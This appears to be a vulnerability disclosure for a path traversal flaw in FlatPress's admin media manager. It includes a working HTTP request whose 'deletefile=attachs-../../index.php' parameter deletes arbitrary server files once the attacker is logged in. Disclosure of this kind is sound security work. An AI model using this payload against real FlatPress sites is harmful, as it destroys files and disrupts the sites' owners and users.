Description

Vulnerability allows deleting files in the server, affect the logic of the source code or disrupt the program to make the original way of operation

Proof of Concept

B1. Login and access to admin.php?p=uploader&action=mediamanager

B2. Delete 1 uploaded file

B3. Change parameter `deletefile=attachs-{file path}

Exg: Delete the file index.php

GET /flatpress-master/admin.php?p=uploader&action=mediamanager&deletefile=attachs-../../index.php HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/flatpress-master/admin.php?p=uploader&action=mediamanager
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u
Connection: close

Impact

Vulnerability allows deleting files in the server, affect the logic of the source code or disrupt the program to make the original way of operation